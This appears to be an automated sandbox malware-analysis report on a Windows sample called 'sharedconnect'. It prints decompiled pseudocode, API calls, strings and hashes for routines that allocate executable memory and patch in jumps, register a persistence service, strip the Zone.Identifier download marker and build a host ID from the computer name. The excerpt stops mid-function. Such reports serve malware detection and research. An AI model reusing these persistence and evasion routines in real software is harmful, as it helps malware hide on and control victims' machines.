Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: ef2fade441bdeb390f7368d9562eaf3a3cfc52e87c97f99f7b319e8259f50101
Instruction ID: cac4985484dac8d64f62c07b6e6ad6a9e7564afcfcb5486e31b4630164abb41a
Opcode Fuzzy Hash: ef2fade441bdeb390f7368d9562eaf3a3cfc52e87c97f99f7b319e8259f50101
Instruction Fuzzy Hash: 2CF0AE21F100574BEB54B3AEDC2116DB7A5AF746E1F14057FC90993571DD31480682D1

Uniqueness

Uniqueness Score: -1.00%

Function 01487105, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 01487105

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: DirectoryWindows
String ID:
API String ID: 3619848164-0
Opcode ID: 54958afbcdc863171a9d0976eeb952fb7ccafb43e5baff35004f63dbff44f577
Instruction ID: ac578bafd67cf5e0ec68d43eb5d73da6e33b5fd0d14ba0bb1709feb63bdcf2d9
Opcode Fuzzy Hash: 54958afbcdc863171a9d0976eeb952fb7ccafb43e5baff35004f63dbff44f577
Instruction Fuzzy Hash: CFD01211D4520886DF31AB08981927AB779E701312F1442CBC90D46770EBB188D086D1

Uniqueness

Uniqueness Score: -1.00%

Function 0148713C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?), ref: 0148714B

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 2d2d197180fd6edc313d271b014a1cc62c019d005d85f535f1ce0c8efd0cc2f3
Instruction ID: 6b0943b952c88ec4c2711ebc1b8f2801f9a322171b7e7c7616231802ef08468e
Opcode Fuzzy Hash: 2d2d197180fd6edc313d271b014a1cc62c019d005d85f535f1ce0c8efd0cc2f3
Instruction Fuzzy Hash: 42C09B7581021C9BC619BBD0DC0EC9AB37CEF04301F218BCBEE1D83925E9B195548751

Uniqueness

Uniqueness Score: -1.00%

Function 01487D93, Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 01487D95

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 126589cb2b2c0f06dc650ddc69f5a0c5a8abb3a91f95cb5285f6338eb6b65e23
Instruction ID: c23c870b6e500febb306b2e5830a52804a697c9002d9d375d17d4435b8a6b04b
Opcode Fuzzy Hash: 126589cb2b2c0f06dc650ddc69f5a0c5a8abb3a91f95cb5285f6338eb6b65e23
Instruction Fuzzy Hash: 11B09232804830866624397C74080AC29905A4413532A07539C72532F46A2008C78182

Uniqueness

Uniqueness Score: -1.00%

Function 01487C5D, Relevance: 1.5, APIs: 1, Instructions: 2COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 01487C5D

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 15888a8a6960fc08304251613e4754391a1e3491502fb4aa22df2d62e5820c62
Instruction ID: 67cc96d6fef0bb638f092e9b87af03fc8cad9cc50c71d485855d6ef55ce9ec34
Opcode Fuzzy Hash: 15888a8a6960fc08304251613e4754391a1e3491502fb4aa22df2d62e5820c62
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 014723BE, Relevance: 1.4, APIs: 1, Instructions: 200
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E014723BE(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x1472162 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x147304c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x147304c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x147304c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E0147217A();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x14e) {
						continue;
					}
					return _t167;
				}
			}

0x014723ea
0x014723ed
0x014723f0
0x014723f3
0x014723f6
0x014723ff
0x01472407
0x0147240a
0x01472410
0x01472416
0x01472422
0x01472428
0x01472433
0x01472445
0x01472454
0x0147245c
0x01472469
0x01472472
0x01472478
0x0147247b
0x0147247e
0x01472481
0x01472484
0x01472487
0x01472497
0x0147249a
0x014724b3
0x014724b8
0x014724be
0x014724c3
0x014724cb
0x014724d2
0x014724d5
0x014724db
0x014724e4
0x014724e7
0x014724fb
0x014724ff
0x01472505
0x0147250a
0x01472515
0x0147251b
0x01472521
0x01472535
0x01472547
0x0147255b
0x01472561
0x01472567
0x0147256d
0x01472573
0x01472573
0x01472588
0x0147258b
0x01472596
0x01472596
0x0147259e
0x014725a4
0x014725aa
0x014725b1
0x014725bb
0x014725c5
0x014725c9
0x014725ce
0x014725da
0x014725dc
0x014725e1
0x014725e4
0x014725ea
0x014725f3
0x014725f6
0x014725f9
0x01472602
0x01472612
0x01472617
0x01472620
0x01472623
0x01472626
0x00000000
0x0147262c
0x01472496
0x01472496

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 014723F6

Memory Dump Source

Source File: 00000007.00000002.742455071.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1470000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ba9edebd92219cd235212e6678565326c9dc212af45b58ad6a745d4d415524d
Instruction ID: 7bcce2c390333f07701759c28da02979d7b69881f29c209e9c692ec83bb1cbff
Opcode Fuzzy Hash: 3ba9edebd92219cd235212e6678565326c9dc212af45b58ad6a745d4d415524d
Instruction Fuzzy Hash: 5A91DF75E002198FCB18CFA8D890ADCBBF1BF89314F1581AAE959EB391D730A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 003C4285, Relevance: 1.4, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 003C4446

Memory Dump Source

Source File: 00000007.00000002.741459553.00000000003C3000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000007.00000002.741376856.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741396018.00000000003B1000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741412231.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741434330.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741445195.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741479571.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741498309.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.741514862.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741550678.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741687270.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741797704.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741831856.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741850316.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction ID: 61ed7a6b9f94bf55bf314b8017f01903d0a359368cd0ddc33f9fffe44f55e38b
Opcode Fuzzy Hash: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction Fuzzy Hash: BD410675A093808FC365DF29D190B9BFBF1ABC8364F14891EE89987350DB3598498F82

Uniqueness

Uniqueness Score: -1.00%

Function 01471DA8, Relevance: 1.3, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01471DEE

Memory Dump Source

Source File: 00000007.00000002.742455071.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1470000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction ID: 8886772c2699c8fa78b4c0151f7a2ed71981e342d65e3d45dfe76ecc85cfe110
Opcode Fuzzy Hash: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction Fuzzy Hash: 8A3135B4A042059FCB48DF69C5846AEBBF1FF88304F20896ED848AB341D775A942CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01488142, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59
serviceCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E01488142() {
				void* _t22;
				void* _t23;
				void* _t29;
				int _t31;
				void* _t33;

				 *((intOrPtr*)(_t33 - 4)) = 0;
				_t29 = OpenSCManagerW(_t31, _t31, ??);
				if(_t29 != 0) {
					 *((intOrPtr*)(_t33 - 0x10)) = 0x250022;
					 *((short*)(_t33 - 8)) = 0;
					 *((intOrPtr*)(_t33 - 0xc)) = 0x220073;
					 *0x148a7cc(_t33 - 0x218, 0x104, _t33 - 0x10, "C:\Windows\SysWOW64\sharedconnect.exe", _t22);
					_t23 = CreateServiceW(_t29, "sharedconnect", "sharedconnect", 0x12, 0x10, 2, _t31, _t33 - 0x218, _t31, _t31, _t31, _t31, _t31);
					if(_t23 != 0) {
						if(L01487EE0(_t16, _t29, _t33 - 4, _t29) != 0) {
							goto 0x1491b3b;
							asm("int3");
							asm("int3");
							 *0x148a5ec();
							_t17 = E014818C0(_t31);
							_t31 = 0;
						}
					} else {
						asm("aam 0xcd");
						asm("int3");
						_t23 = OpenServiceW(??, ??, ??);
					}
					if(_t23 != 0) {
						_t31 = StartServiceW();
						_t17 = CloseServiceHandle(_t23);
					}
					L014880B0(_t17, _t29);
					CloseServiceHandle(_t29);
				}
				return _t31;
			}

0x01488142
0x01488151
0x01488155
0x0148815d
0x01488165
0x01488178
0x01488185
0x014881b2
0x014881b6
0x014881d6
0x014881d8
0x014881dd
0x014881de
0x014881df
0x014881e7
0x014881ec
0x014881ec
0x014881b8
0x014881bd
0x014881bf
0x014881c6
0x014881c6
0x014881f0
0x014881fe
0x01488200
0x01488200
0x01488208
0x0148820e
0x01488214
0x0148821c

APIs

OpenSCManagerW.ADVAPI32 ref: 0148814B
_snwprintf.NTDLL ref: 01488185
CreateServiceW.ADVAPI32(00000000,sharedconnect,sharedconnect,00000012,00000010,00000002,?,?), ref: 014881AC

Strings

sharedconnect, xrefs: 014881A1, 014881A6
", xrefs: 0148815D
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 0148816C
s, xrefs: 01488178

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CreateManagerOpenService_snwprintf
String ID: "$C:\Windows\SysWOW64\sharedconnect.exe$s$sharedconnect
API String ID: 2040870185-1699388139
Opcode ID: 516a7634395c685b39b5407db710ac2fc0f6dd8531d778b0f82bbcd3d6cbeee9
Instruction ID: bf94ce4710c6865c5acb559690f70bc9b43aa68b120b11ddc4004914fbfd978e
Opcode Fuzzy Hash: 516a7634395c685b39b5407db710ac2fc0f6dd8531d778b0f82bbcd3d6cbeee9
Instruction Fuzzy Hash: FC01047060020AA6DB21AB998CC8BFFBA78EF44710F60005BEA05B3260EBF496064651

Uniqueness

Uniqueness Score: -1.00%

Function 01482261, Relevance: 6.0, APIs: 4, Instructions: 10
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01482261(void* __eax) {

				 *0x148a648();
				CryptDestroyKey( *0x148a878);
				CryptDestroyKey( *0x148a874);
				return CryptReleaseContext( *0x148a870, 0);
			}

0x01482266
0x01482272
0x0148227e
0x01482292

APIs

CryptDestroyHash.ADVAPI32 ref: 01482266
CryptDestroyKey.ADVAPI32 ref: 01482272
CryptDestroyKey.ADVAPI32 ref: 0148227E
CryptReleaseContext.ADVAPI32(00000000), ref: 0148228C

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Crypt$Destroy$ContextHashRelease
String ID:
API String ID: 3577760690-0
Opcode ID: 737afd6d249e50443e0735a3d619368f3d7c75613e3213cc5aab2b3d693a6807
Instruction ID: 2d8237e2768949921c1c0c07b1db7fa8f7cbc5ba9b3cd3660684ab0276326def
Opcode Fuzzy Hash: 737afd6d249e50443e0735a3d619368f3d7c75613e3213cc5aab2b3d693a6807
Instruction Fuzzy Hash: FED0C2710620009BDB212BA1E90DA0C3B61F784305B30411BA285A317CC7E584529B24

Uniqueness

Uniqueness Score: -1.00%

Function 0148839A, Relevance: 47.3, APIs: 1, Strings: 26, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0148839A(intOrPtr* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
				 *__eax =  *__eax + __eax;
			}

0x0148839f
0x014883a4

APIs

_snwprintf.NTDLL ref: 01488473

Strings

d, xrefs: 0148841F
\, xrefs: 014883EE
R, xrefs: 014883E7
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 014883B9
n, xrefs: 01488442
R, xrefs: 01488465
w, xrefs: 01488426
F, xrefs: 014883D9
i, xrefs: 01488457
r, xrefs: 0148843B
n, xrefs: 0148846C
S, xrefs: 014883D2
f, xrefs: 0148840A
V, xrefs: 01488449
", xrefs: 014883AA
s, xrefs: 014883C5
n, xrefs: 0148845E
u, xrefs: 01488434
W, xrefs: 014883E0
s, xrefs: 01488403
\, xrefs: 0148842D
r, xrefs: 014883FC
\, xrefs: 01488411
r, xrefs: 01488450
i, xrefs: 014883F5
i, xrefs: 01488418

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: "$C:\Windows\SysWOW64\sharedconnect.exe$F$R$R$S$V$W$\$\$\$d$f$i$i$i$n$n$n$r$r$r$s$s$u$w
API String ID: 3988819677-687175188
Opcode ID: ea1d14384978cbe20387851ae56e8ee592354cbc8716721d4a95da08b2fa3c03
Instruction ID: 2525aa7000c2ccefa34056cf5a30a3e37816231a6b34eb66ec8f252af5ca4845
Opcode Fuzzy Hash: ea1d14384978cbe20387851ae56e8ee592354cbc8716721d4a95da08b2fa3c03
Instruction Fuzzy Hash: 9221B0B0C01359DBDB10CF91A9886EDBFB5BB05708F20415ADA186A252D7FA46898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01487C7A, Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 29COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,0000001C,?,?,C:\Windows\SysWOW64), ref: 01487CCE
_snwprintf.NTDLL ref: 01487CE7

Strings

C:\Windows\SysWOW64, xrefs: 01487C81, 01487CD4, 01487CE2
%, xrefs: 01487C7A
w, xrefs: 01487CC3
f, xrefs: 01487CA7
r, xrefs: 01487C99
\, xrefs: 01487C8B
d, xrefs: 01487CBC
\, xrefs: 01487CAE
s, xrefs: 01487CA0
i, xrefs: 01487CB5
i, xrefs: 01487C92

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: FolderPath_snwprintf
String ID: %$C:\Windows\SysWOW64$\$\$d$f$i$i$r$s$w
API String ID: 3078599568-3812650318
Opcode ID: c9438a4391ae69608c9fcf9f40f5bcd168021fe73db069b2af44a1cef998fd23
Instruction ID: ba09b731718636ca1336890794a79e8eba59fb05875a6f11d9c5a471be672c4a
Opcode Fuzzy Hash: c9438a4391ae69608c9fcf9f40f5bcd168021fe73db069b2af44a1cef998fd23
Instruction Fuzzy Hash: F1F0ECB094020CEFEB00DFD59809AEDBEB9EB04719F20804AD614B7251C3FA06488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 014813AB, Relevance: 21.0, APIs: 2, Strings: 10, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E014813AB(short __eax) {
				void* _t20;

				 *((intOrPtr*)(_t20 - 0x28)) = 0x730025;
				 *((short*)(_t20 - 4)) = __eax;
				 *((intOrPtr*)(_t20 - 0x24)) = 0x5a003a;
				 *((intOrPtr*)(_t20 - 0x20)) = 0x6e006f;
				 *((intOrPtr*)(_t20 - 0x1c)) = 0x2e0065;
				 *((intOrPtr*)(_t20 - 0x18)) = 0x640049;
				 *((intOrPtr*)(_t20 - 0x14)) = 0x6e0065;
				 *((intOrPtr*)(_t20 - 0x10)) = 0x690074;
				 *((intOrPtr*)(_t20 - 0xc)) = 0x690066;
				 *((intOrPtr*)(_t20 - 8)) = 0x720065;
				 *0x148a7cc(_t20 - 0x230, 0x104, _t20 - 0x28, "C:\Windows\SysWOW64\sharedconnect.exe");
				return DeleteFileW(_t20 - 0x230);
			}

0x014813ab
0x014813b2
0x014813c5
0x014813d2
0x014813d9
0x014813e0
0x014813e7
0x014813ee
0x014813f5
0x014813fc
0x01481403
0x0148141c

APIs

_snwprintf.NTDLL ref: 01481403
DeleteFileW.KERNEL32(?), ref: 01481413

Strings

f, xrefs: 014813F5
e, xrefs: 014813FC
%, xrefs: 014813AB
I, xrefs: 014813E0
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 014813B9
o, xrefs: 014813D2
e, xrefs: 014813D9
e, xrefs: 014813E7
:, xrefs: 014813C5
t, xrefs: 014813EE

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: DeleteFile_snwprintf
String ID: %$:$C:\Windows\SysWOW64\sharedconnect.exe$I$e$e$e$f$o$t
API String ID: 366827715-964619653
Opcode ID: 03ce7dbe81eb4cbad885d58432b271a4e53858092613d61c24f8fc5a5b2f6e95
Instruction ID: b0f315831ce329688322b10cb3c681dae64d3dbb9426bc386e749f730ed33aaf
Opcode Fuzzy Hash: 03ce7dbe81eb4cbad885d58432b271a4e53858092613d61c24f8fc5a5b2f6e95
Instruction Fuzzy Hash: 26F0A4B0811258ABDB10DFC1E9886DEBFBAFF04709F10519AD50576600D7BA47988FA5

Uniqueness

Uniqueness Score: -1.00%

Function 01487E19, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01487E19(DWORD* __eax) {
				char _t28;
				char* _t32;
				void* _t33;

				 *(_t33 - 8) = 0x10;
				 *((intOrPtr*)(_t33 - 0x10)) = 0x255f7325;
				 *((intOrPtr*)(_t33 - 0xc)) = 0x583830;
				 *(_t33 - 4) = 0x58;
				if(GetComputerNameW(_t33 - 0x40, __eax) == 0) {
					L12:
					 *(_t33 - 0x20) = 0x58;
					L13:
					return  *0x148a7c8("045012_AF72BC4A", 0x104, _t33 - 0x10, _t33 - 0x20,  *0x148a844);
				}
				 *0x148a83c = E01481450(_t33 - 0x40);
				if((0 | WideCharToMultiByte(0, 0x400, _t33 - 0x40, 0xffffffff, _t33 - 0x20, 0x10, _t33 - 4, 0) > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t33 - 0x20;
				if( *(_t33 - 0x20) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t28 =  *_t32;
					if(_t28 < 0x30 || _t28 > 0x39) {
						if(_t28 < 0x61 || _t28 > 0x7a) {
							if(_t28 < 0x41 || _t28 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

0x01487e19
0x01487e24
0x01487e2c
0x01487e33
0x01487e41
0x01487ea8
0x01487ea8
0x01487eae
0x01487ed2
0x01487ed2
0x01487e4d
0x01487e78
0x00000000
0x00000000
0x01487e7e
0x01487e81
0x00000000
0x00000000
0x00000000
0x00000000
0x01487e83
0x01487e83
0x01487e83
0x01487e87
0x01487e8f
0x01487e97
0x01487e9d
0x01487e9d
0x01487e97
0x01487e8f
0x01487ea0
0x01487ea1
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 01487E39
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000058,00000000), ref: 01487E69
_snprintf.NTDLL ref: 01487EC6

Strings

X, xrefs: 01487EA8
X, xrefs: 01487E33
08X, xrefs: 01487E2C
%s_%, xrefs: 01487E24
045012_AF72BC4A, xrefs: 01487EC1

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide_snprintf
String ID: %s_%$045012_AF72BC4A$08X$X$X
API String ID: 4080658169-64918874
Opcode ID: 2407dbeeb076973118314dd719ca6578d14cc3006f178c5118fbd76212cf0b15
Instruction ID: 27f4ef22f1c3920c26e7c06f314e2a4e64f5ba3a2f6c408790ce467629f34be4
Opcode Fuzzy Hash: 2407dbeeb076973118314dd719ca6578d14cc3006f178c5118fbd76212cf0b15
Instruction Fuzzy Hash: 4B11C071840109AAEF21EB98CC54BFEBBB8BF15715F64014FE641B61E0D7B489868B25

Uniqueness

Uniqueness Score: -1.00%

Function 01487D07, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01487D07(void* __eax, void* __ebx, intOrPtr __ecx) {
				void* __esi;
				intOrPtr _t18;
				void* _t21;
				void* _t24;

				_t18 = __ecx;
				_t1 = __ecx + 0x65;
				 *_t1 =  *((intOrPtr*)(__ecx + 0x65)) + __ebx;
				 *((intOrPtr*)(_t24 - 0x14)) = 0x730025;
				 *((intOrPtr*)(_t24 - 0x10)) = 0x25005c;
				 *((intOrPtr*)(_t24 - 0xc)) = 0x2e0073;
